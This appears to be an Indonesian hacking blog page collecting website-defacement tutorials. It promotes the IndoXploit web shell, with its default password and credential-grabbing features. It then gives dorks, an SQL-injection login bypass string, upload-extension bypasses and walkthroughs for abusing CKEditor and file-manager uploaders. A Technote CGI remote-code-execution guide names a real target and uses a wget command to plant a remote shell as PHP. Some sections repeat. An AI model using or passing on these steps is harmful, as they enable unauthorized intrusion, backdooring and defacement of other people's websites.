Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Hai Guys...
Kali ini saya bakal share IndoXploit Shell First Edition [V.2] :D
Shell yang satu ini memang sudah tidak asing lagi bagi para defacer, dengan tampilan yang simple dan fiturnya yang mantap.
Tampilan shellnya sebagai berikut :
Kali ini saya bakal share IndoXploit Shell First Edition [V.2] :D
Shell yang satu ini memang sudah tidak asing lagi bagi para defacer, dengan tampilan yang simple dan fiturnya yang mantap.
Tampilan shellnya sebagai berikut :
Password default shell : IndoXploit
Fitur :
K-RDP Shell :
Fitur untuk membuat akun RDP yang hanya dapat digunakan di Windows Server
BackConnect
Cpanel/FTP Auto Deface :
memakai fitur ftp_connect, hanya memanfaatkan kessamaan password cpanel dan ftp saja. Tidak Semuanya Bisa,
Config :
- CMS POPOJI
- CMS Voodoo
- Wordpress
- Joomla
- Drupal
- Magento
- Ellislab Devteam [CI]
- OpenCart
- Prestashop
- Lokomedia
- Sitelook
- Bosweb
- WHMCS
- Cpanel
Jumping [error fixed]
Jumping hpshere & Jumping /var/vhosts [Updated]
kelebihannya yaitu bisa langsung ambil nama domainnya
Cpanel Crack [blank user/pass fixed]:
Fitur ini sudah otomatis grab passwordnya dan otomatis mengambil info domainnya,ikuti saja petunjuknya.
SMTP Grabber :
Hanya mengambil info SMTP joomla yang ada di config.
Auto Edit User / MPC :
Otomatis edit user admin dari config, tidak semuanya bisa. cuma beberapa cms aja.
untuk yang mau download shellnya Disini
Sekian Postingan kali ini. Terima kasih
Sumber : www.indoxploit.or.id
Status : AKTIF / WORK
===================
===================
Bahan- Bahan Yang Kamu Butuhkan :
- Visual Basic 2010 / 2013
- Visual Basic 6.0
- Base Cheat
=======================================
- Visual Basic 2010 / 2013
- Visual Basic 6.0
- Base Cheat
=======================================
Free Download Base Cheat Lost Saga :
OkeHacker & X-CHEAT-VIP
WEBSITE OKEHACKER >>wWw.OkeHacker2.TK<<
Oke ga usah basa basi lagi
Dork :
- Inurl:admin/index.php intext:Admin Login
- Inurl:adminpanel/index.php
NB: Kalo mau dapet target yang perawan, silahkan kembangkan dork pake otak bokep kelen :''v
Step by Step :
1. Dorking di google
2. Pilih target kalian, saya sudah punya target sendiri :''v
Masukkan username dan password nya
Username : '=''or'
Password : '=''or'
3. Kalau vuln, maka akan masuk ke halaman admin nya, kalau ga masuk, ya udah cari target lain :'v
4. Silahkan upload shell anda di tempat upload gambar
Bypass ext :
- shell.php.xxxjpg
- shell.php.pjpeg
NB : kalau tidak bisa di bypass, pakai Tamper Data :) atau pakai Burpsuite
Sekian Terimakasih
Hallo Minna Disini Saya Mau Share Tools Symlink Auto Get Config - Tidak Usah Basa Basi Ya Langsung aja Cek !
[ DISINI GAN ]
[ DISINI GAN ]
Cukup Sekian Dan Terima Kasih Assalamualaikum Wr Wb
SUMBER : TATSUMI CREW
Dork :
- "/assets/master/ckeditor/plugins/imageuploader/"
- Inurl:/assets/master/ckeditor/plugins/imageuploader/
- inurl:/imageuploader/ "imgdelete.php"
Step by Step :
1. Dorking di google
2. Pilih target kalian
3. Setelah itu, klik " Imgbrowser.php "
4. Klik tanda " panah ke arah atas " di samping paling atas, kalau tidak tau, itu screenshot nya dan sudah saya lingkari
5. Setelah itu, upload image/foto kalian.....
6. Setelah di upload, dimana akses nya?? di sini
Site.com//assets//uploads//namafotokalian.jpg
7. dan WIKILEAF touched :')
Bingung? silahkan comment atau contact saja saya
Facebook : Touch Me
Sumber : Magelang1337
Thanks to : www.magelang1337.com - Justice Crew - GopressXploits - Tatsumi Crew :)
Oke gausah banyak bacot lagi...
Dork : inurl:/filemanager/ intitle:index of
Kembangin lagi yaa, biar bisa dapet target yang perawan, biar bisa dinikmatin pas di eue
Exploit : nothing
Step by Step :
1. Dorking di google, pilih target kalian
2. Nanti disitu ada banyak pilihan, dan kamu klik " dialog.php "
3. Ada tanda anu di atas kiri layar... klik itu
Kalau gak jelas silahkan liat di screenshot dibawah
4. Upload shell kalian.. bypass ext nya : .php.fla , .php.accdb
5. Akses shell :'D
6. Oh iya, karena ini web target saya tidak bisa upload shell meskipun udah di bypass, jadi saya upload HTML aja h3h3h3
Dan setelah itu, silahkan mau kalian apakan, saya sarankan jangan tebas index tanpa backup, kalian tidak tau betapa susahnya membuat web itu wkwk
Sekian terimakasih
Hallo mina disini saya akan share tutorial deface Teknik RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability
Tidak Usah Basa Basi Langsung Aja Ke TKP..........
Pertama Kita Dorking Dulu Webnya :
Google Dork 1 : inurl:/cgi-bin/technote/
inurl:".cgi?board=FREE_BOARD"
intext:"TECHNOTE-TOP"
kembangkan lagi bang biar banyak yang perawan
disini saya sudah mempunyai target :)
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD&number=20&view=2&howmanytext=
kita ambil linknya sampe FREE_BOARD SAJA
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD
Langkah Selajutnya Kita Download Dulu Tools/Exploit nya :)
https://pastebin.com/raw/jb4Zf0kn
Ubah Ekstensi Menjadi pl karena ini codingan perl
gimana sih cara jalanin toolsnya ?
anda bisa menggunakan xampp
karena disini saya menggunakan OS Berbasis Ubuntu Jadi tidak Perlu Install Install Lagi h3h3
Langkah Selanjutnya
Buka Terminalnya
kalian cukup ketik perintah / copy :
perl namafile.pl target
Enter Maka Hasilnya Akan Seperti Ini
itu berati vuln ? tidak semua yang vuln bisa ditanem shell/file lainnya
disini kita akan tanem shell dengan menggunakan direct txt ke php
gimana sih caranya ?
setelah ss di atas ketik perintah ls < untuk menampilkan folder folder / file yang ada di web tersebut
maka hasilnya akan seperti diatas
setelah itu anda tinggal masuk ke salah satu folder diatas
disini saya akan masuk ke folder board
dengan ketik perintah cd board
maka hasilnya akan seperti ini
nah disini yang akan kita lakukan untuk menanem shell backdor anda bisa menggunakan shell backdor yang berada di web kami yang ber eks .txt
gimana sih ko txt bisa diubah ke php ?
dengan ketik perintah diterminal
wget http://showbizz98.com/tc.txt -O kontol.php < nah itu kontol.php adalah untuk mengubah shell txt ke php
jika berhasil maka hasilnya akan seperti ss di atas
bang dimana sih letak shell nya :'( ?
kan tadi sebelumnya kita sudah masuk folder kita ambil aja contoh link di atas /cgi_bin/board/namashell.php
Pertama Kita Dorking Dulu Webnya :
Google Dork 1 : inurl:/cgi-bin/technote/
inurl:".cgi?board=FREE_BOARD"
intext:"TECHNOTE-TOP"
kembangkan lagi bang biar banyak yang perawan
disini saya sudah mempunyai target :)
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD&number=20&view=2&howmanytext=
kita ambil linknya sampe FREE_BOARD SAJA
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD
Langkah Selajutnya Kita Download Dulu Tools/Exploit nya :)
https://pastebin.com/raw/jb4Zf0kn
Ubah Ekstensi Menjadi pl karena ini codingan perl
gimana sih cara jalanin toolsnya ?
anda bisa menggunakan xampp
karena disini saya menggunakan OS Berbasis Ubuntu Jadi tidak Perlu Install Install Lagi h3h3
Langkah Selanjutnya
Buka Terminalnya
kalian cukup ketik perintah / copy :
perl namafile.pl target
Enter Maka Hasilnya Akan Seperti Ini
itu berati vuln ? tidak semua yang vuln bisa ditanem shell/file lainnya
disini kita akan tanem shell dengan menggunakan direct txt ke php
gimana sih caranya ?
setelah ss di atas ketik perintah ls < untuk menampilkan folder folder / file yang ada di web tersebut
maka hasilnya akan seperti diatas
setelah itu anda tinggal masuk ke salah satu folder diatas
disini saya akan masuk ke folder board
dengan ketik perintah cd board
maka hasilnya akan seperti ini
nah disini yang akan kita lakukan untuk menanem shell backdor anda bisa menggunakan shell backdor yang berada di web kami yang ber eks .txt
gimana sih ko txt bisa diubah ke php ?
dengan ketik perintah diterminal
wget http://showbizz98.com/tc.txt -O kontol.php < nah itu kontol.php adalah untuk mengubah shell txt ke php
jika berhasil maka hasilnya akan seperti ss di atas
bang dimana sih letak shell nya :'( ?
kan tadi sebelumnya kita sudah masuk folder kita ambil aja contoh link di atas /cgi_bin/board/namashell.php
SUMBER : TATSUMI CREW
